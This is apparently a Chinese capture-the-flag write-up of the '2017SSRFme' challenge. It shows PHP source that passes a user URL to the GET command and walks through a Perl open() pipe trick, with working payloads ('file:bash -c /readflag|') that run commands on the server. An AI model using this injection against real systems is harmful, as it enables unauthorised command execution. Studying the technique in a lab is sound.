2017SSRFme

源码如下:

<?php
// 1. 检查是否存在 X-Forwarded-For 头,若存在则将 REMOTE_ADDR 设置为第一个IP
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; // 可控点:客户端可伪造IP
}

// 2. 输出客户端IP
echo $_SERVER["REMOTE_ADDR"];

// 3. 创建沙箱目录:基于固定字符串 "orange" + 客户端IP 的MD5值
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);      // 创建目录(如 sandbox/c6a6a758...)
@chdir($sandbox);      // 切换到该目录

// 4. 发起请求:通过 GET 参数 url 执行系统命令
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

// 5. 处理文件名参数,过滤目录名中的点
$info = pathinfo($_GET["filename"]);
$dir  = str_replace(".", "", basename($info["dirname"])); // 过滤目录名中的点
@mkdir($dir);          // 创建子目录
@chdir($dir);          // 进入子目录

// 6. 将请求结果写入文件(文件名可控)
@file_put_contents(basename($info["basename"]), $data);

// 7. 显示当前文件代码
highlight_file(__FILE__);

这题的关键点显然就在于GET参数url,首先创建一个测试目录,


/?url=/&filename=test

然后将orange与自己的ip地址拼接在一起进行MD5加密,加密后的值就是路径

进入目录

可以看到有flag,但是访问不了,我们可以用readingflag来访问

payload思路是GET,GET在执行过程中会调用Perl的open函数,如果文件名以 | 结尾,Perl 会将其视为命令并执行

构造payload

/?url=file:bash -c /readflag|&filename=bash -c /readflag|
 

/?url=file:bash -c /readflag|&filename=test

再访问之前test目录

得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值